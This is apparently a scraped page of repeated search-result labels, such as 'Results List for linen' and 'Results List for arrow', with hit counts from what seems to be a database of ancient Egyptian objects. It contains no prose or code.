(hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for 1 - (hits/occ.: 145)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for glove - (hits/occ.: 10)Results List for jar - (hits/occ.: 61)Results List for mask - (hits/occ.: 1)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for gauntlet - (hits/occ.: 15)Results List for jar - (hits/occ.: 61)Results List for garland - (hits/occ.: 2)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for jar - (hits/occ.: 61)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for glove - (hits/occ.: 10)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for chariot - (hits/occ.: 135)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for chariot - (hits/occ.: 135)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for seal - (hits/occ.: 16)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for chariot - (hits/occ.: 135)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for gauntlet - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for bouquet - (hits/occ.: 6)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for glove - (hits/occ.: 10)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for glove - (hits/occ.: 10)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for bouquet - (hits/occ.: 6)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for anubis - (hits/occ.: 5)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for bouquet - (hits/occ.: 6)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for seal - (hits/occ.: 16)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for de - (hits/occ.: 418)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for garland - (hits/occ.: 2)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for chariot - (hits/occ.: 135)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for food - (hits/occ.: 49)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for bouquet - (hits/occ.: 6)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for de - (hits/occ.: 418)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for garland - (hits/occ.: 2)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for chariot - (hits/occ.: 135)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for 